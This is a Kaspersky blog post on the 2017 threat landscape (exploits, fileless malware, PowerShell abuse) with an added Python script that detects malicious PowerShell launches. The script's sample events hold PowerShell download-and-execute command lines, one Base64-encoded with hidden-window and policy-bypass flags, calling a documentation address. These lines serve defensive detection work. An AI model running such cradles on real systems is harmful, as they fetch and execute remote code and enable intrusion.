RSA 2017: A thorough look into the threat landscape | Kaspersky official blog https://www.kaspersky.com/blog/rsa-2017-threat-landscape/15167/ Fri, 17 Feb 2017 18:30:52 +0000 https://kasperskydaily.com/b2b/?p=6534 Right now RSA, an annual cybersecurity conference held in San Francisco, is wrapping up. We would not miss this event. Our experts spoke in a number of tracks, briefing the audience on the ecosystem of Russian-speaking crypto ransomware and the challenges of APT attribution. Also, we shared our general vision of today’s threat landscape at Kaspersky Lab’s booth.

It’s no secret that the threat landscape is constantly changing. However, the key trend here is the consolidation of the cybercriminal industry. We used to divide threats into conventional cybercrime (moderate impact but still annoying), professional cybercrime, and APTs (advanced persistent threats, the province of a small contingent of government-sponsored hacker groups). Now these lines are blurring. Professional cybercrime gangs, motivated mainly by profit, on the one hand increasingly use conventional methods and on the other hand frequently act as mercenaries, serving the interests of various groups (sometimes governments). This has a dual impact on the cybersecurity environment: advanced attacks are increasingly carried out at scale, and attribution becomes even harder. In turn, complex and “high-end” APT attacks are giving way to plain “targeted attacks,” which rely less on persistence and can use old but still effective Trojans and even legitimate tools.

Let’s take a detailed look at the methods cybercrooks are using increasingly often in targeted attacks.

Exploits

Practically every targeted attack relies on exploits. Until recently, those were zero-day exploits, for vulnerabilities not yet publicly known. Such exploits are still menacing, but zero-day attacks are now rare. Today most damage is done through so-called one-day vulnerabilities: flaws that have already been found and, what’s worse, published. Even when developers have issued patches, the time it takes to apply them to the affected systems is enough for cybercriminals to attack thousands of victims. Moreover, there are “any-day” vulnerabilities: a staggering number of systems remain unpatched for years.

A number of methods exist to battle this disease, but we think True Cybersecurity can be achieved through a combination of technology levels. First, patching should be fully automated. No doubt patching is a complex, difficult task that administrators have trouble keeping up with. But patching alone is not enough: exploits must be rendered harmless before the patch arrives. Fortunately, fewer exploitation techniques exist than actual exploits, so our security toolset includes several methods to protect critical processes against exploitation. We prefer noninvasive methods based on behavioral analytics, which detect exploit-related activity without deep inspection of processes.

Fileless malware

Another problem gaining prominence is fileless malware. It cannot be detected by scanning a hard drive, and as soon as it completes its tasks it disappears, leaving no traces to aid investigation.

However, we know how to fight this type of threat. To detect threats that operate in system memory, we have to work on a number of levels. First, we have to keep an eye on memory activity and terminate processes that behave in ways legitimate software does not. For that method to be effective, however, the technology that tracks in-memory processes needs access to additional data, such as URL reputation and a whitelist maintained from the management console. Machine-learning technologies are also required, to process and streamline this information and to assess new behavioral data about processes. This approach makes detection more effective, regardless of any tricks a cybercriminal might pull.

Legitimate tools

Strange as it may seem, legitimate programs, in particular code interpreters, have become a threat. When malware uses legitimate tools to launch, attacks become quite hard to detect. The processes associated with these interpreters are usually viewed as trusted, even when they execute malicious instructions. Such programs are also frequently cross-platform, which means a threat can have even more impact.

One of the most dangerous tools of this kind is PowerShell. PowerShell scripts are, well, very powerful. PowerShell-based malware can do many things: download more malware, execute code remotely, and run exploits, including fileless Trojans. It’s no wonder cybercriminals have been turning to PowerShell lately.

To protect against the malicious use of legitimate tools, we recommend removing unnecessary code interpreters from your systems or using application control to block them. Also, use proven security solutions that rely on a multilevel approach and next-gen behavioral analysis, which uncovers both suspicious activity and the ways scripts are launched and where they come from.
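As an added example (not code from the original post or from any Kaspersky product) of the detection logic the fileless-malware and legitimate-tools sections describe, the script below scores PowerShell process-creation records for the signals a SOC analyst looks at: an Office parent process, a -EncodedCommand blob (decoded from the UTF-16LE Base64 form PowerShell actually uses, so the hidden script can be inspected), a hidden window, an execution-policy bypass, download cradles and Invoke-Expression. The events, the 203.0.113.7 address, the weights and the alert threshold are all constructed for the illustration.

```python
import base64
import re

# Constructed stage-2 payload, encoded the way PowerShell expects for
# -EncodedCommand (UTF-16LE, then Base64). 203.0.113.7 is a documentation address.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/stage2.ps1')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16le")).decode("ascii")

# Constructed process-creation records, as a SIEM holds them after parsing
# Windows 4688 / Sysmon Event ID 1: parent image, image, full command line.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmd": "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand " + _ENCODED},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmd": "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')\""},
    {"parent": "services.exe", "image": "svchost.exe", "cmd": "svchost.exe -k netsvcs"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-ex(?:ec|ecutionpolicy)?\s+bypass", re.I)
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I)
INVOKE_RE = re.compile(r"\biex\b|invoke-expression", re.I)
ALERT_THRESHOLD = 4  # arbitrary weights and threshold, chosen for the illustration


def decode_encoded_command(cmd):
    """Recover the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def score_event(event):
    """Return (score, reasons, decoded_script) for one process-creation record."""
    if event["image"].lower() not in INTERPRETERS:
        return 0, [], None
    cmd = event["cmd"]
    score, reasons = 0, []
    if event["parent"].lower() in OFFICE_PARENTS:
        score += 3
        reasons.append(f"interpreter spawned by Office application {event['parent']}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        score += 2
        reasons.append("Base64-encoded command (decoded for analysis)")
    if HIDDEN_RE.search(cmd):
        score += 1
        reasons.append("hidden window requested")
    if BYPASS_RE.search(cmd):
        score += 1
        reasons.append("execution policy bypass")
    # Look for cradles and IEX in the visible command line and in the decoded script.
    effective = cmd if decoded is None else cmd + "\n" + decoded
    if CRADLE_RE.search(effective):
        score += 2
        reasons.append("download cradle")
    if INVOKE_RE.search(effective):
        score += 2
        reasons.append("Invoke-Expression of dynamic content")
    return score, reasons, decoded


def triage(events):
    """Return the events that cross the alert threshold, highest score first."""
    hits = []
    for ev in events:
        score, reasons, decoded = score_event(ev)
        if score >= ALERT_THRESHOLD:
            hits.append({"score": score, "parent": ev["parent"],
                         "reasons": reasons, "decoded": decoded})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["score"], hit["parent"], hit["reasons"])
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

The administrative script launched from explorer.exe with -NoProfile scores zero, which is why -NoProfile is deliberately not a signal here: legitimate automation uses it constantly. In a real deployment the same scoring would also be applied to the script text recorded by PowerShell Script Block Logging (Event ID 4104), which captures what actually ran even when the command line reveals nothing.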

Of course, these are not the only methods cybercriminals use in targeted attacks. Our experts think that true cybersecurity within an organization requires an adaptive cybersecurity model, one built on systems that constantly adapt to the ever-changing threat landscape. In general, we recommend that you:

  • Protect all endpoints with a multilevel intrusion prevention system;
  • Deploy solutions to fight unknown threats across the infrastructure;
  • Make sure employees are ready to respond to threats and have access to an effective toolset, including access to outside experts;
  • Regularly audit infrastructure and application security with the help of outside researchers, and use additional sources of threat analytics to predict the next attack vector;
  • Nurture employee awareness about the latest cyberthreats.

Having these processes deployed and streamlined across the entire organization will help protect it against cyberattacks, targeted or not.
